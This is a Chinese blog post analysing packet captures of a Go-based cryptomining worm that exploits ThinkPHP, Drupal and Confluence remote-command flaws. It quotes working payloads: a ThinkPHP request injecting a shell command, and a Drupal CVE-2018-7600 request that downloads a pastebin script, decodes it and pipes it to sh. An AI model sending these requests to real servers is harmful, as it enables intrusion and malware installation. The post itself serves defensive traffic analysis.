网络流量威胁-恶意代码web RCE漏洞PCAP分析

PCAPLAB · · 1608 次点击 · · 开始浏览    
这是一个创建于 的文章,其中的信息可能已经有所发展或是发生改变。

1、web应用远程命令执行漏洞

RCE漏洞,可以让攻击者直接向后台服务器远程注入操作系统命令或者代码,从而控制后台系统。一般出现这种漏洞,是因为应用系统从设计上需要给用户提供指定的远程命令操作的接口。比如我们常见的路由器、防火墙入侵检测等设备的web管理界面上,一般会给用户提供一个ping操作的web界面,用户从web界面输入目标,提交后,后台会对该P地址进行一次ping测试,并返回测试结果,而,如果,设计者在完成该功能时,没有做严格的安全控制,则可能会导致攻击者通过该接口提交意想不到的命令,从而让后台进行执行,从而控制整个后台服务器

2、golang挖矿蠕虫

样本6dcbd7ff8aeeb8e9fff861cbea912c2d使用了7种不同的方法:4个web应用程序漏洞(2个针对ThinkPHP,1个针对Drupal, 1个针对Confluence), SSH凭据枚举,Redis数据库密码枚举,并尝试使用找到的SSH密钥连接其他机器。本文分析web类型漏洞2 targeting ThinkPHP, 1 targeting Drupal, and 1 targeting Confluence

3、PCAP分析

golangpcap下载

80扫描行为


80端口扫描

CVE-2019-3396 Confluence


ThinkPHP5 5.0.23 RCE

thinkphp 5.0.23(完整版)

(post)public/index.php?s=captcha (data) _method=__construct&filter[]=system&method=get&server[REQUEST_METHOD]=ls -al

ThinkPHP5 5.0.23 RCE

CVE-2019-9082

CVE-2019-9082



CVE-2018-7600 Drupal

POST /user/register?element_parents=timezone/timezone/%23value&ajax_form=1&_wrapper_format=drupal_ajax HTTP/1.1

Host: 61.141.0.*

User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:55.0) Gecko/20100101 Firefox/55.0

Content-Length: 215

Content-Type: application/x-www-form-urlencoded

X-Forwarded-For: 127.0.0.1

Accept-Encoding: gzip

form_id=user_register_form&_drupal_ajax=1&mail[#post_render][]=exec&mail[#type]=markup&mail[#markup]=((wget -q -O- https://pastebin.com/raw/xvfxprtb || curl -fsSL https://pastebin.com/raw/xvfxprtb) | base64 -d) | shHTTP/1.1 404 Not Found


CVE-2018-7600 Drupal

参考

【1】CVE-2019-9082 https://vuldb.com/?id.131158

【2】thinkphp 5.X RCE https://www.exploit-db.com/exploits/46150

【3】RCE http://www.hackdig.com/?11/hack-15364.htm


有疑问加站长微信联系(非本文作者)

本文来自:简书

感谢作者:PCAPLAB

查看原文:网络流量威胁-恶意代码web RCE漏洞PCAP分析

入群交流(和以上内容无关):加入Go大咖交流群,或添加微信:liuxiaoyan-s 备注:入群;或加QQ群:692541889

1608 次点击  
加入收藏 微博
暂无回复
添加一条新回复 (您需要 登录 后才能回复 没有账号 ?)
  • 请尽量让自己的回复能够对别人有帮助
  • 支持 Markdown 格式, **粗体**、~~删除线~~、`单行代码`
  • 支持 @ 本站用户;支持表情(输入 : 提示),见 Emoji cheat sheet
  • 图片支持拖拽、截图粘贴等方式上传